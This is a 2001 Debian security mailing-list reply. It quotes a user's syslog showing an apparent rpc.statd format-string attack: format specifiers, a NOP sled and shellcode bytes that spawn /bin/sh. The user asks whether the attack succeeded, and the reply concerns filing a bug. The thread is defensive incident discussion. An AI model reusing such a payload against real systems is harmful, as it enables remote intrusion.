[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: rpc.statd attack?

I filed a bug against hostname for this behavior.  Perhaps I should refile
it against libc6...  Doogie, if you're reading this and you beat me to the
punch, go for it...

On Tue, 9 Jan 2001 crusius@stanford.edu wrote:

>I got the following (alarming) messages on syslog:
>
>Jan  8 13:34:23 yuban syslogd: Cannot glue message parts together
>Jan  8 13:34:23 yuban /sbin/rpc.statd[159]: gethostbyname error for ^X\xf7\xff\xbf^X\xf7\xff\xbf^Y\xf7\ xff\xbf^Y\xf7\xff\xbf^Z\xf7\xff\xbf^Z\xf7\xff\xbf^[\xf7\xff\xbf^[\xf7\xff\xbf%8x%8x%8x%8x%8x%8x%8x%8x%8 x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\ 220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\ 220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
>Jan  8 13:34:23 yuban \xc7^F/bin\xc7F^D/shA0\xc0\210F^G\211v^L\215V^P\215N^L\211\xf3\xb0^K\xcd\200\xb0^ A\xcd\200\xe8\177\xff\xff\xff
>
>it looks like an attack (specially when I see /bin/sh hidden in
>there). I searched the lists and it seems that this problem should
>have been corrected before potato was released. Any reason for
>worries, or is there any reason why I should think it was an
>unsuccessful attack?
>
>
>--
>Cesar Augusto Rorato Crusius    __o      __o      __o      __o      __o    
>Stanford University           _`\<,    _`\<,    _`\<,    _`\<,    _`\<,    
>e-mail:c.crusius@ieee.org    (_)/(_)  (_)/(_)  (_)/(_)  (_)/(_)  (_)/(_)   
>www.stanford.edu/~crusius
>                                       o      _     _         _
>   __o      __o      __o      __o     /\_   _ \\o  (_)\__/o  (_)
> _`\<,    _`\<,    _`\<,    _`\<,    _>(_) (_)/<_    \_| \   _|/' \/
>(_)/(_)  (_)/(_)  (_)/(_)  (_)/(_)  (_)        (_)   (_)    (_)'  _\o_
>
>He who sacrifices functionality for ease of use
>Loses both and deserves neither
>
>
>--  
>To UNSUBSCRIBE, email to debian-security-request@lists.debian.org
>with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
>

-- 
Pardon me, but you have obviously mistaken me for someone who gives a
damn.
email galt@inconnu.isu.edu
Reply to: